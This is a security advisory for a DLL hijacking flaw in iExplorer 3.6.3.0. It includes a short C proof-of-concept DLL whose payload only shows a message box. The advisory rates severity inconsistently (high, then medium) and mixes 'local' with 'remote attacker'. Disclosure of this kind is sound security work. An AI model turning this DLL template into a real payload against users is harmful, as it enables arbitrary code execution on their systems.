Document Title:
===============
iExplorer 3.6.3 - DLL Hijacking Exploit itunesmobiledevice.dll
=============
2015-07-30
Product & Service Introduction:
===============================
iExplorer lets you easily transfer music from any iPhone, iPod or iPad to a Mac or PC computer and iTunes. You can search for
and preview particular songs then copy them to iTunes with the touch of a button or with drag and drop. Looking to transfer
more than just a few tracks? With one click, iExplorer lets you instantly rebuild entire playlists or use the Auto Transfer
feature and copy everything from your device to iTunes.
Discovery Status:
=================
Published
Affected Product(s):
====================
Macroplant
Product: iExplorer 3.6.3.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
Macroplant iExplorer could allow a remote attacker to execute arbitrary code on the system. The application does not directly specify the fully
qualified path to a dynamic-linked library (itunesmobiledevice.dll) when running on Microsoft Windows. By persuading a victim to open a
specially-crafted file from a WebDAV or SMB share using a vulnerable application, a remote attacker could exploit this vulnerability via a
specially-crafted library to execute arbitrary code on the system.
Proof of Concept (PoC):
=======================
/*
* Exploit Title: iExplorer 3.6.3.0 DLL Hijacking Exploit (itunesmobiledevice.dll)
* Author: Tonel Team[Zeus_Syborg]
* Vendor Homepage: http://www.macroplant.com/
* Soft link :http://www.macroplant.com/downloads
* Tested on: Windows 8.1Google chrome
*/
#include <windows.h>
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
owned();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int owned() {
MessageBox(0, "iExplorer DLL HijackedZeus_Syborg", "POC", MB_OK);
}
Security Risk:
==============
The security risk of the local software vulnerability is estimated as medium. (CVSS 8.0)
Credits & Authors:
==================
Zeus_Syborg [Tonel Team]